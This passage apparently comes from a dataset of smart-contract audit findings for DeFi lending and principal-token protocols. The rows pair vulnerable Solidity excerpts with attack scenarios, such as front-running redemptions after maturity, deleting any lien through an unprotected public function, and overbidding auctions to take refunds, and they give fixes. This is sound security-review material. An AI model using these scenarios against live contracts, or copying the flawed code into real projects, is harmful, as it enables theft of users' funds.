msg.sender, address(this), a);\\n\\n // Mint the tokens received from the user\\n IERC5095(principalToken(u, m)).authMint(msg.sender, a);\\n\\n emit Mint(p, u, m, a);\\n\\n return true;\\n }\\n```\\n\\nIt is a simple function that accepts the principal token and mints the corresponding ERC5095 tokens in return. There are no restrictions on timing, the user can mint even after the maturity. Malicious actors can take this as an advantage to pump their bags on behalf of legitimate early users.\\nScenario:\\nLegitimate users lend and mint their ERC5095 tokens before maturity.\\nWhen the maturity kicks in, lender tokens are redeemed and holdings are updated.\\nLegitimate users try to redeem their ERC5095 for the underlying tokens. The formula is `(amount * holdings[u][m]) / token.totalSupply();`\\nA malicious actor sandwiches legitimate users, and mints the ERC5095 thus increasing the totalSupply and reducing other user shares. Then redeem principals again and burn their own shares for increased rewards.\\nExample with concrete values:\\nuserA deposits `100` tokens, user B deposits `200` tokens. The total supply minted is `300` ERC5095 tokens.\\nAfter the maturity the redemption happens and now let's say `holdings[u][m]` is `330` (+30).\\nuserA tries to redeem the underlying. The expected amount is: `100` * `330` / `300` = 110. However, this action is frontrunned by userC (malicious) who mints yet another `500` tokens post-maturity. The total supply becomes `800`. The real value userA now receives is: 110 * `330` / `800` = 45.375.\\nAfter that the malicious actor userC invokes the redemption again, and the `holdings[u][m]` is now `330` - 45.375 + `550` = 834.625.\\nuserC redeems the underlying: `500` * 834.625 / 700 ~= 596.16 (expected was 550).\\nNow all the remaining users will also slightly benefit, e.g. in this case userB redeems what's left: `200` * 238.46 / `200` = 238.46 (expected was 220).",Issue Lend or mint after maturity\\nLend/mint should be forbidden post-maturity.,"The amount legitimate users receive will be devaluated, while malicious actor can increase their ROI without meaningfully contributing to the protocol and locking their tokens.","```\\n function mint(\\n uint8 p,\\n address u,\\n uint256 m,\\n uint256 a\\n ) external unpaused(u, m, p) returns (bool) {\\n // Fetch the desired principal token\\n address principal = IMarketPlace(marketPlace).token(u, m, p);\\n\\n // Transfer the users principal tokens to the lender contract\\n Safe.transferFrom(IERC20(principal), msg.sender, address(this), a);\\n\\n // Mint the tokens received from the user\\n IERC5095(principalToken(u, m)).authMint(msg.sender, a);\\n\\n emit Mint(p, u, m, a);\\n\\n return true;\\n }\\n```\\n" +Incorrect parameters,medium,"Some functions and integrations receive the wrong parameters.\\nHere, this does not work:\\n```\\n } else if (p == uint8(Principals.Notional)) {\\n // Principal token must be approved for Notional's lend\\n ILender(lender).approve(address(0), address(0), address(0), a);\\n```\\n\\nbecause it basically translates to:\\n```\\n } else if (p == uint8(Principals.Notional)) {\\n if (a != address(0)) {\\n Safe.approve(IERC20(address(0)), a, type(uint256).max);\\n }\\n```\\n\\nIt tries to approve a non-existing token. It should approve the underlying token and Notional's token contract.\\nAnother issue is with Tempus here:\\n```\\n // Swap on the Tempus Router using the provided market and params\\n ITempus(controller).depositAndFix(x, lent, true, r, d);\\n\\n // Calculate the amount of Tempus principal tokens received after the deposit\\n uint256 received = IERC20(principal).balanceOf(address(this)) - start;\\n\\n // Verify that a minimum number of principal tokens were received\\n if (received < r) {\\n revert Exception(11, received, r, address(0), address(0));\\n }\\n```\\n\\nIt passes `r` as a slippage parameter and later checks that received >= `r`. However, in Tempus this parameter is not exactly the minimum amount to receive, it is the ratio which is calculated as follows:\\n```\\n /// @param minTYSRate Minimum exchange rate of TYS (denominated in TPS) to receive in exchange for TPS\\n function depositAndFix(\\n ITempusAMM tempusAMM,\\n uint256 tokenAmount,\\n bool isBackingToken,\\n uint256 minTYSRate,\\n uint256 deadline\\n ) external payable nonReentrant {\\n// rest of code\\n uint256 minReturn = swapAmount.mulfV(minTYSRate, targetPool.backingTokenONE());\\n```\\n","Review all the integrations and function invocations, and make sure the appropriate parameters are passed.","Inaccurate parameter values may lead to protocol misfunction down the road, e.g. insufficient approval or unpredicted slippage.","```\\n } else if (p == uint8(Principals.Notional)) {\\n // Principal token must be approved for Notional's lend\\n ILender(lender).approve(address(0), address(0), address(0), a);\\n```\\n" +Sense PT redemptions do not allow for known loss scenarios,medium,"Sense PT redemptions do not allow for known loss scenarios, which will lead to principal losses\\nThe Sense PT redemption code in the `Redeemer` expects any losses during redemption to be due to a malicious adapter, and requires that there be no losses. However, there are legitimate reasons for there to be losses which aren't accounted for, which will cause the PTs to be unredeemable. The Lido FAQ page lists two such reasons:\\n```\\n- Slashing risk\\n\\nETH 2.0 validators risk staking penalties, with up to 100% of staked funds at risk if validators fail. To minimise this risk, Lido stakes across multiple professional and reputable node operators with heterogeneous setups, with additional mitigation in the form of insurance that is paid from Lido fees.\\n\\n- stETH price risk\\n\\nUsers risk an exchange price of stETH which is lower than inherent value due to withdrawal restrictions on Lido, making arbitrage and risk-free market-making impossible. \\n\\nThe Lido DAO is driven to mitigate above risks and eliminate them entirely to the extent possible. Despite this, they may still exist and, as such, it is our duty to communicate them.\\n```\\n\\nIf Lido is slashed, or there are withdrawal restrictions, the Sense series sponsor will be forced to settle the series, regardless of the exchange rate (or miss out on their rewards). The Sense `Divider` contract anticipates and properly handles these losses, but the Illuminate code does not.\\nLido is just one example of a Sense token that exists in the Illuminate code base - there may be others added in the future which also require there to be allowances for losses.",Allow losses during redemption if Sense's `Periphery.verified()` returns `true`,"Permanent freezing of funds\\nThere may be a malicious series sponsor that purposely triggers a loss, either by DOSing Lido validators, or by withdrawing enough to trigger withdrawal restrictions. In such a case, the exchange rate stored by Sense during the settlement will lead to losses, and users that hold Illumimate PTs (not just the users that minted Illuminate PTs with Sense PTs), will lose their principal, because Illuminate PT redemptions are an a share-of-underlying basis, not on the basis of the originally-provided token.\\nWhile the Illuminate project does have an emergency `withdraw()` function that would allow an admin to rescue the funds and manually distribute them, this would not be trustless and defeats the purpose of having a smart contract.","```\\n- Slashing risk\\n\\nETH 2.0 validators risk staking penalties, with up to 100% of staked funds at risk if validators fail. To minimise this risk, Lido stakes across multiple professional and reputable node operators with heterogeneous setups, with additional mitigation in the form of insurance that is paid from Lido fees.\\n\\n- stETH price risk\\n\\nUsers risk an exchange price of stETH which is lower than inherent value due to withdrawal restrictions on Lido, making arbitrage and risk-free market-making impossible. \\n\\nThe Lido DAO is driven to mitigate above risks and eliminate them entirely to the extent possible. Despite this, they may still exist and, as such, it is our duty to communicate them.\\n```\\n" +Notional PT redemptions do not use flash-resistant prices,medium,"Notional PT redemptions do not use the correct function for determining balances, which will lead to principal losses\\nEIP-4626 states the following about maxRedeem():\\n```\\nMUST return the maximum amount of shares that could be transferred from `owner` through `redeem` and not cause a revert, which MUST NOT be higher than the actual maximum that would be accepted (it should underestimate if necessary).\\n\\nMUST factor in both global and user-specific limits, like if redemption is entirely disabled (even temporarily) it MUST return 0.\\n```\\n\\nThe above means that the implementer is free to return less than the actual balance, and is in fact required to return zero if the token's backing store is paused, and Notional's can be paused. While neither of these conditions currently apply to the existing wfCashERC4626 implementation, there is nothing stopping Notional from implementing the MUST-return-zero-if-paused fix tomorrow, or from changing their implementation to one that requires `maxRedeem()` to return something other than the current balance.","Use `balanceOf()` rather than `maxRedeem()` in the call to `INotional.redeem()`, and make sure that Illuminate PTs can't be burned if `Lender` still has Notional PTs that it needs to redeem (based on its own accounting of what is remaining, not based on balance checks, so that it can't be griefed with dust).","Permanent freezing of funds\\nIf `maxRedeem()` were to return zero, or some other non-exact value, fewer Notional PTs would be redeemed than are available, and users that redeem()ed their shares, would receive fewer underlying (principal if they minted Illuminate PTs with Notional PTs, e.g. to be an LP in the pool) than they are owed. The Notional PTs that weren't redeemed would still be available for a subsequent call, but if a user already redeemed their Illuminate PTs, their loss will already be locked in, since their Illuminate PTs will have been burned. This would affect ALL Illuminate PT holders of a specific market, not just the ones that provided the Notional PTs, because Illuminate PT redemptions are an a share-of-underlying basis, not on the basis of the originally-provided token. Markets that are already live with Notional set cannot be protected via a redemption pause by the Illuminate admin, because redemption of Lender's external PTs for underlying does not use the `unpaused` modifier, and does have any access control.","```\\nMUST return the maximum amount of shares that could be transferred from `owner` through `redeem` and not cause a revert, which MUST NOT be higher than the actual maximum that would be accepted (it should underestimate if necessary).\\n\\nMUST factor in both global and user-specific limits, like if redemption is entirely disabled (even temporarily) it MUST return 0.\\n```\\n" +Marketplace.setPrincipal do not approve needed allowance for Element vault and APWine router,medium,`Marketplace.setPrincipal` do not approve needed allowance for `Element vault` and `APWine router`\\n`Marketplace.setPrincipal` is used to provide principal token for the base token and maturity when it was not set yet. To set PT you also provide protocol that this token belongs to.\\nIn case of `APWine` protocol there is special block of code to handle all needed allowance. But it is not enough.\\n```\\n } else if (p == uint8(Principals.Apwine)) {\\n address futureVault = IAPWineToken(a).futureVault();\\n address interestBearingToken = IAPWineFutureVault(futureVault)\\n .getIBTAddress();\\n IRedeemer(redeemer).approve(interestBearingToken);\\n } else if (p == uint8(Principals.Notional)) {\\n```\\n\\nBut in `setPrincipal` we don't have such params and allowance is not set. So `Lender` will not be able to work with that tokens correctly.,"Add 2 more params as in `createMarket` and call `ILender(lender).approve(u, e, a, address(0));`",Lender will not provide needed allowance and protocol integration will fail.,```\\n } else if (p == uint8(Principals.Apwine)) {\\n address futureVault = IAPWineToken(a).futureVault();\\n address interestBearingToken = IAPWineFutureVault(futureVault)\\n .getIBTAddress();\\n IRedeemer(redeemer).approve(interestBearingToken);\\n } else if (p == uint8(Principals.Notional)) {\\n```\\n +ERC5095.mint function calculates slippage incorrectly,medium,"ERC5095.mint function calculates slippage incorrectly. This leads to lost of funds for user.\\n`ERC5095.mint` function should take amount of shares that user wants to receive and then buy this amount. It uses hardcoded 1% slippage when trades base tokens for principal. But it takes 1% of calculated assets amount, not shares.\\n```\\n function mint(address r, uint256 s) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 assets = Cast.u128(previewMint(s));\\n Safe.transferFrom(\\n IERC20(underlying),\\n msg.sender,\\n address(this),\\n assets\\n );\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n assets - (assets / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n\\nThis is how slippage is provided\\n```\\nuint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n assets - (assets / 100)\\n );\\n```\\n\\nBut the problem is that assets it is amount of base tokens that user should pay for the shares he want to receive. Slippage should be calculated using shares amount user expect to get.\\nExample. User calls mint and provides amount 1000. That means that he wants to get 1000 principal tokens. While converting to assets, assets = 990. That means that user should pay 990 base tokens to get 1000 principal tokens. Then the `sellUnderlying` is send and slippage provided is `990*0.99=980.1`. So when something happens with price it's possible that user will receive 980.1 principal tokens instead of 1000 which is 2% lost.\\nTo fix this you should provide `s - (s / 100)` as slippage.","Use this.\\n```\\nuint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n s- (s / 100)\\n );\\n```\\n",Lost of users funds.,"```\\n function mint(address r, uint256 s) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 assets = Cast.u128(previewMint(s));\\n Safe.transferFrom(\\n IERC20(underlying),\\n msg.sender,\\n address(this),\\n assets\\n );\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n assets - (assets / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n" +ERC5095.deposit doesn't check if received shares is less then provided amount,medium,"`ERC5095.deposit` doesn't check if received shares is less then provided amount. In some cases this leads to lost of funds.\\nThe main thing with principal tokens is to buy them when the price is lower (you can buy 101 token while paying only 100 base tokens) as underlying price and then at maturity time to get interest(for example in one month you will get 1 base token in our case).\\n`ERC5095.deposit` function takes amount of base token that user wants to deposit and returns amount of shares that he received. To not have loses, the amount of shares should be at least bigger than amount of base tokens provided by user.\\n```\\n function deposit(address r, uint256 a) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 shares = Cast.u128(previewDeposit(a));\\n Safe.transferFrom(IERC20(underlying), msg.sender, address(this), a);\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n Cast.u128(a),\\n shares - (shares / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n\\nWhile calling market place, you can see that slippage of 1 percent is provided.\\n```\\nuint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n Cast.u128(a),\\n shares - (shares / 100)\\n );\\n```\\n\\nBut this is not enough in some cases.\\nFor example we have `ERC5095` token with short maturity which provides `0.5%` of interests. userA calls `deposit` function with 1000 as base amount. He wants to get back 1005 share tokens. And after maturity time earn 5 tokens on this trade.\\nBut because of slippage set to `1%`, it's possible that the price will change and user will receive 995 share tokens instead of 1005, which means that user has lost 5 base tokens.\\nI propose to add one more mechanism except of slippage. We need to check if returned shares amount is bigger then provided assets amount.","Add this check at the end `require(returned > a, ""received less than provided"")`",Lost of funds.,"```\\n function deposit(address r, uint256 a) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 shares = Cast.u128(previewDeposit(a));\\n Safe.transferFrom(IERC20(underlying), msg.sender, address(this), a);\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n Cast.u128(a),\\n shares - (shares / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n" +Curve LP Controller withdraw and claim function uses wrong signature,medium,"The function signature used for `WITHDRAWCLAIM` in both CurveLPStakingController.sol and BalancerLPStakingController.sol are incorrect, leading to the function not succeeding.\\nIn both the CurveLPStakingController.sol and BalancerLPStakingController.sol contracts, the function selector `0x00ebf5dd` is used for `WITHDRAWCLAIM`. This selector corresponds to a function signature of `withdraw(uint256,address,bool)`.\\n```\\nbytes4 constant WITHDRAWCLAIM = 0x00ebf5dd;\\n```\\n\\nHowever, the `withdraw()` function in the Curve contract does not have an address argument. Instead, the function signature reads `withdraw(uint256,bool)`, which corresponds to a function selector of `0x38d07436`.",Change the function selector in both contracts to `0x38d07436`.,Users who have deposited assets into Curve pools will not be able to claim their rewards when they withdraw their tokens.,```\\nbytes4 constant WITHDRAWCLAIM = 0x00ebf5dd;\\n```\\n +Strategist nonce is not checked,medium,"Strategist nonce is not checked while checking commitment. This makes impossible for strategist to cancel signed commitment.\\n`VaultImplementation.commitToLien` is created to give the ability to borrow from the vault. The conditions of loan are discussed off chain and owner or delegate of the vault then creates and signes deal details. Later borrower can provide it as `IAstariaRouter.Commitment calldata params` param to `VaultImplementation.commitToLien`.\\nAfter the checking of signer of commitment `VaultImplementation._validateCommitment` function calls `AstariaRouter.validateCommitment`.\\n```\\n function validateCommitment(IAstariaRouter.Commitment calldata commitment)\\n public\\n returns (bool valid, IAstariaRouter.LienDetails memory ld)\\n {\\n require(\\n commitment.lienRequest.strategy.deadline >= block.timestamp,\\n ""deadline passed""\\n );\\n\\n\\n require(\\n strategyValidators[commitment.lienRequest.nlrType] != address(0),\\n ""invalid strategy type""\\n );\\n\\n\\n bytes32 leaf;\\n (leaf, ld) = IStrategyValidator(\\n strategyValidators[commitment.lienRequest.nlrType]\\n ).validateAndParse(\\n commitment.lienRequest,\\n COLLATERAL_TOKEN.ownerOf(\\n commitment.tokenContract.computeId(commitment.tokenId)\\n ),\\n commitment.tokenContract,\\n commitment.tokenId\\n );\\n\\n\\n return (\\n MerkleProof.verifyCalldata(\\n commitment.lienRequest.merkle.proof,\\n commitment.lienRequest.merkle.root,\\n leaf\\n ),\\n ld\\n );\\n }\\n```\\n\\nThis function check additional params, one of which is `commitment.lienRequest.strategy.deadline`. But it doesn't check for the nonce of strategist here. But this nonce is used while signing.\\nAlso `AstariaRouter` gives ability to increment nonce for strategist, but it is never called. That means that currently strategist use always same nonce and can't cancel his commitment.",Give ability to strategist to call `increaseNonce` function.,Strategist can't cancel his commitment. User can use this commitment to borrow up to 5 times.,"```\\n function validateCommitment(IAstariaRouter.Commitment calldata commitment)\\n public\\n returns (bool valid, IAstariaRouter.LienDetails memory ld)\\n {\\n require(\\n commitment.lienRequest.strategy.deadline >= block.timestamp,\\n ""deadline passed""\\n );\\n\\n\\n require(\\n strategyValidators[commitment.lienRequest.nlrType] != address(0),\\n ""invalid strategy type""\\n );\\n\\n\\n bytes32 leaf;\\n (leaf, ld) = IStrategyValidator(\\n strategyValidators[commitment.lienRequest.nlrType]\\n ).validateAndParse(\\n commitment.lienRequest,\\n COLLATERAL_TOKEN.ownerOf(\\n commitment.tokenContract.computeId(commitment.tokenId)\\n ),\\n commitment.tokenContract,\\n commitment.tokenId\\n );\\n\\n\\n return (\\n MerkleProof.verifyCalldata(\\n commitment.lienRequest.merkle.proof,\\n commitment.lienRequest.merkle.root,\\n leaf\\n ),\\n ld\\n );\\n }\\n```\\n" +"The implied value of a public vault can be impaired, liquidity providers can lose funds",high,"The implied value of a public vault can be impaired, liquidity providers can lose funds\\nBorrowers can partially repay their liens, which is handled by the `_payment` function (LienToken.sol#L594). When repaying a part of a lien, `lien.amount` is updated to include currently accrued debt (LienToken.sol#L605-L617):\\n```\\nLien storage lien = lienData[lienId];\\nlien.amount = _getOwed(lien); // @audit current debt, including accrued interest; saved to storage!\\n```\\n\\nNotice that `lien.amount` is updated in storage, and `lien.last` wasn't updated.\\nThen, lien's slope is subtracted from vault's slope accumulator to be re-calculated after the repayment (LienToken.sol#L620-L630):\\n```\\nif (isPublicVault) {\\n // @audit calculates and subtracts lien's slope from vault's slope\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n}\\nif (lien.amount > paymentAmount) {\\n lien.amount -= paymentAmount;\\n // @audit lien.last is updated only after payment amount subtraction\\n lien.last = block.timestamp.safeCastTo32();\\n // slope does not need to be updated if paying off the rest, since we neutralize slope in beforePayment()\\n if (isPublicVault) {\\n // @audit re-calculates and re-applies lien's slope after the repayment\\n IPublicVault(lienOwner).afterPayment(lienId);\\n }\\n}\\n```\\n\\nIn the `beforePayment` function, `LIEN_TOKEN().calculateSlope(lienId)` is called to calculate lien's current slope (PublicVault.sol#L433-L442):\\n```\\nfunction beforePayment(uint256 lienId, uint256 amount) public onlyLienToken {\\n _handleStrategistInterestReward(lienId, amount);\\n uint256 lienSlope = LIEN_TOKEN().calculateSlope(lienId);\\n if (lienSlope > slope) {\\n slope = 0;\\n } else {\\n slope -= lienSlope;\\n }\\n last = block.timestamp;\\n}\\n```\\n\\nThe `calculateSlope` function reads a lien from storage and calls `_getOwed` again (LienToken.sol#L440-L445):\\n```\\nfunction calculateSlope(uint256 lienId) public view returns (uint256) {\\n // @audit lien.amount includes interest accrued so far\\n Lien memory lien = lienData[lienId];\\n uint256 end = (lien.start + lien.duration);\\n uint256 owedAtEnd = _getOwed(lien, end);\\n // @audit lien.last wasn't updated in `_payment`, it's an older timestamp\\n return (owedAtEnd - lien.amount).mulDivDown(1, end - lien.last);\\n}\\n```\\n\\nThis is where double counting of accrued interest happens. Recall that lien's amount already includes the interest that was accrued by this moment (in the `_payment` function). Now, interest is calculated again and is applied to the amount that already includes (a portion) it (LienToken.sol#L544-L550):\\n```\\nfunction _getOwed(Lien memory lien, uint256 timestamp)\\n internal\\n view\\n returns (uint256)\\n{\\n // @audit lien.amount already includes interest accrued so far\\n return lien.amount + _getInterest(lien, timestamp);\\n}\\n```\\n\\nLienToken.sol#L177-L196:\\n```\\nfunction _getInterest(Lien memory lien, uint256 timestamp)\\n internal\\n view\\n returns (uint256)\\n{\\n if (!lien.active) {\\n return uint256(0);\\n }\\n uint256 delta_t;\\n if (block.timestamp >= lien.start + lien.duration) {\\n delta_t = uint256(lien.start + lien.duration - lien.last);\\n } else {\\n // @audit lien.last wasn't updated in `_payment`, so the `delta_t` is bigger here\\n delta_t = uint256(timestamp.safeCastTo32() - lien.last);\\n }\\n return\\n // @audit rate applied to a longer delta_t and multiplied by a bigger amount than expected\\n delta_t.mulDivDown(lien.rate, 1).mulDivDown(\\n lien.amount,\\n INTEREST_DENOMINATOR\\n );\\n}\\n```\\n","In the `_payment` function, consider updating `lien.amount` after the `beforePayment` call:\\n```\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/src/LienToken.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/LienToken.sol\\n@@ // Remove the line below\\n614,12 // Add the line below\\n614,13 @@ contract LienToken is ERC721, ILienToken, Auth, TransferAgent {\\n type(IPublicVault).interfaceId\\n );\\n\\n// Remove the line below\\n lien.amount = _getOwed(lien);\\n// Remove the line below\\n\\n address payee = getPayee(lienId);\\n if (isPublicVault) {\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n }\\n// Add the line below\\n\\n// Add the line below\\n lien.amount = _getOwed(lien);\\n// Add the line below\\n\\n if (lien.amount > paymentAmount) {\\n lien.amount // Remove the line below\\n= paymentAmount;\\n lien.last = block.timestamp.safeCastTo32();\\n```\\n\\nIn this case, lien's slope calculation won't be affected in the `beforePayment` call and the correct slope will be removed from the slope accumulator.","Double counting of interest will result in a wrong lien slope, which will affect the vault's slope accumulator. This will result in an invalid implied value of a vault (PublicVault.sol#L406-L413):\\nIf miscalculated lien slope is bigger than expected, vault's slope will be smaller than expected (due to the subtraction in beforePayment), and vault's implied value will also be smaller. Liquidity providers will lose money because they won't be able to redeem the whole liquidity (vault's implied value, `totalAssets`, is used in the conversion of LP shares, ERC4626-Cloned.sol#L392-L412)\\nIf miscalculated lien slope is smaller than expected, vault's slope will be higher, and vaults implied value will also be higher. However, it won't be backed by actual liquidity, thus the liquidity providers that exit earlier will get a bigger share of the underlying assets. The last liquidity provider won't be able to get their entire share.","```\\nLien storage lien = lienData[lienId];\\nlien.amount = _getOwed(lien); // @audit current debt, including accrued interest; saved to storage!\\n```\\n" +buyoutLien() will cause the vault to fail to processEpoch(),high,"LienToken#buyoutLien() did not reduce vault#liensOpenForEpoch when vault#processEpoch()will check vault#liensOpenForEpoch[currentEpoch] == uint256(0) so processEpoch() will fail\\nwhen create LienToken , vault#liensOpenForEpoch[currentEpoch] will ++ when repay or liquidate , vault#liensOpenForEpoch[currentEpoch] will -- and LienToken#buyoutLien() will transfer from vault to to other receiver,so liensOpenForEpoch need reduce\\n```\\nfunction buyoutLien(ILienToken.LienActionBuyout calldata params) external {\\n // rest of code.\\n /**** tranfer but not liensOpenForEpoch-- *****/\\n _transfer(ownerOf(lienId), address(params.receiver), lienId);\\n }\\n```\\n","Issue buyoutLien() will cause the vault to fail to processEpoch()\\n```\\n function buyoutLien(ILienToken.LienActionBuyout calldata params) external {\\n// rest of code.\\n\\n+ //do decreaseEpochLienCount()\\n+ address lienOwner = ownerOf(lienId);\\n+ bool isPublicVault = IPublicVault(lienOwner).supportsInterface(\\n+ type(IPublicVault).interfaceId\\n+ );\\n+ if (isPublicVault && !AUCTION_HOUSE.auctionExists(collateralId)) { \\n+ IPublicVault(lienOwner).decreaseEpochLienCount(\\n+ IPublicVault(lienOwner).getLienEpoch(lienData[lienId].start + lienData[lienId].duration)\\n+ );\\n+ } \\n\\n lienData[lienId].last = block.timestamp.safeCastTo32();\\n lienData[lienId].start = block.timestamp.safeCastTo32();\\n lienData[lienId].rate = ld.rate.safeCastTo240();\\n lienData[lienId].duration = ld.duration.safeCastTo32();\\n _transfer(ownerOf(lienId), address(params.receiver), lienId);\\n }\\n```\\n",processEpoch() maybe fail,"```\\nfunction buyoutLien(ILienToken.LienActionBuyout calldata params) external {\\n // rest of code.\\n /**** tranfer but not liensOpenForEpoch-- *****/\\n _transfer(ownerOf(lienId), address(params.receiver), lienId);\\n }\\n```\\n" +_deleteLienPosition can be called by anyone to delete any lien they wish,high,"`_deleteLienPosition` is a public function that doesn't check the caller. This allows anyone to call it an remove whatever lien they wish from whatever collateral they wish\\n```\\nfunction _deleteLienPosition(uint256 collateralId, uint256 position) public {\\n uint256[] storage stack = liens[collateralId];\\n require(position < stack.length, ""index out of bounds"");\\n\\n emit RemoveLien(\\n stack[position],\\n lienData[stack[position]].collateralId,\\n lienData[stack[position]].position\\n );\\n for (uint256 i = position; i < stack.length - 1; i++) {\\n stack[i] = stack[i + 1];\\n }\\n stack.pop();\\n}\\n```\\n\\n`_deleteLienPosition` is a `public` function and doesn't validate that it's being called by any permissioned account. The result is that anyone can call it to delete any lien that they want. It wouldn't remove the lien data but it would remove it from the array associated with `collateralId`, which would allow it to pass the `CollateralToken.sol#releaseCheck` and the underlying to be withdrawn by the user.",Change `_deleteLienPosition` to `internal` rather than `public`.,All liens can be deleted completely rugging lenders,"```\\nfunction _deleteLienPosition(uint256 collateralId, uint256 position) public {\\n uint256[] storage stack = liens[collateralId];\\n require(position < stack.length, ""index out of bounds"");\\n\\n emit RemoveLien(\\n stack[position],\\n lienData[stack[position]].collateralId,\\n lienData[stack[position]].position\\n );\\n for (uint256 i = position; i < stack.length - 1; i++) {\\n stack[i] = stack[i + 1];\\n }\\n stack.pop();\\n}\\n```\\n" +Public vaults can become insolvent because of missing `yIntercept` update,high,"The deduction of `yIntercept` during payments is missing in `beforePayment()` which can lead to vault insolvency.\\n`yIntercept` is declared as ""sum of all LienToken amounts"" and documented elsewhere as ""yIntercept (virtual assets) of a PublicVault"". It is used to calculate the total assets of a public vault as: slope.mulDivDown(delta_t, 1) + `yIntercept`.\\nIt is expected to be updated on deposits, payments, withdrawals, liquidations. However, the deduction of `yIntercept` during payments is missing in `beforePayment()`. As noted in the function's Natspec:\\n```\\n /**\\n * @notice Hook to update the slope and yIntercept of the PublicVault on payment.\\n * The rate for the LienToken is subtracted from the total slope of the PublicVault, and recalculated in afterPayment().\\n * @param lienId The ID of the lien.\\n * @param amount The amount paid off to deduct from the yIntercept of the PublicVault.\\n */\\n```\\n\\nthe amount of payment should be deducted from `yIntercept` but is missing.",Issue Public vaults can become insolvent because of missing `yIntercept` update\\nUpdate `yIntercept` in `beforePayment()` by the `amount` value.,This missing update will inflate the inferred value of the public vault corresponding to its actual value leading to eventual insolvency because of resulting protocol miscalculations.,"```\\n /**\\n * @notice Hook to update the slope and yIntercept of the PublicVault on payment.\\n * The rate for the LienToken is subtracted from the total slope of the PublicVault, and recalculated in afterPayment().\\n * @param lienId The ID of the lien.\\n * @param amount The amount paid off to deduct from the yIntercept of the PublicVault.\\n */\\n```\\n" +Bidder can cheat auction by placing bid much higher than reserve price when there are still open liens against a token,high,"When a token still has open liens against it only the value of the liens will be paid by the bidder but their current bid will be set to the full value of the bid. This can be abused in one of two ways. The bidder could place a massive bid like 500 ETH that will never be outbid or they could place a bid they know will outbid and profit the difference when they're sent a refund.\\n```\\nuint256[] memory liens = LIEN_TOKEN.getLiens(tokenId);\\nuint256 totalLienAmount = 0;\\nif (liens.length > 0) {\\n for (uint256 i = 0; i < liens.length; ++i) {\\n uint256 payment;\\n uint256 lienId = liens[i];\\n\\n ILienToken.Lien memory lien = LIEN_TOKEN.getLien(lienId);\\n\\n if (transferAmount >= lien.amount) {\\n payment = lien.amount;\\n transferAmount -= payment;\\n } else {\\n payment = transferAmount;\\n transferAmount = 0;\\n }\\n if (payment > 0) {\\n LIEN_TOKEN.makePayment(tokenId, payment, lien.position, payer);\\n }\\n }\\n} else {\\n //@audit-issue logic skipped if liens.length > 0\\n TRANSFER_PROXY.tokenTransferFrom(\\n weth,\\n payer,\\n COLLATERAL_TOKEN.ownerOf(tokenId),\\n transferAmount\\n );\\n}\\n```\\n\\nWe can examine the payment logic inside `_handleIncomingPayment` and see that if there are still open liens against then only the amount of WETH to pay back the liens will be taken from the payer, since the else portion of the logic will be skipped.\\n```\\nuint256 vaultPayment = (amount - currentBid);\\n\\nif (firstBidTime == 0) {\\n auctions[tokenId].firstBidTime = block.timestamp.safeCastTo64();\\n} else if (lastBidder != address(0)) {\\n uint256 lastBidderRefund = amount - vaultPayment;\\n _handleOutGoingPayment(lastBidder, lastBidderRefund);\\n}\\n_handleIncomingPayment(tokenId, vaultPayment, address(msg.sender));\\n\\nauctions[tokenId].currentBid = amount;\\nauctions[tokenId].bidder = address(msg.sender);\\n```\\n\\nIn `createBid`, `auctions[tokenId].currentBid` is set to `amount` after the last bidder is refunded and the excess is paid against liens. We can walk through an example to illustrate this:\\nAssume a token with a single lien of amount 10 WETH and an auction is opened for that token. Now a user places a bid for 20 WETH. They are the first bidder so `lastBidder = address(0)` and `currentBid = 0`. `_handleIncomingPayment` will be called with a value of 20 WETH since there is no lastBidder to refund. Inside `_handleIncomingPayment` the lien information is read showing 1 lien against the token. Since `transferAmount >= lien.amount`, `payment = lien.amount`. A payment will be made by the bidder against the lien for 10 WETH. After the payment `_handleIncomingPayment` will return only having taken 10 WETH from the bidder. In the next line currentBid is set to 20 WETH but the bidder has only paid 10 WETH. Now if they are outbid, the new bidder will have to refund then 20 WETH even though they initially only paid 10 WETH.","In `_handleIncomingPayment`, all residual transfer amount should be sent to `COLLATERAL_TOKEN.ownerOf(tokenId)`.",Bidder can steal funds due to `_handleIncomingPayment` not taking enough WETH,"```\\nuint256[] memory liens = LIEN_TOKEN.getLiens(tokenId);\\nuint256 totalLienAmount = 0;\\nif (liens.length > 0) {\\n for (uint256 i = 0; i < liens.length; ++i) {\\n uint256 payment;\\n uint256 lienId = 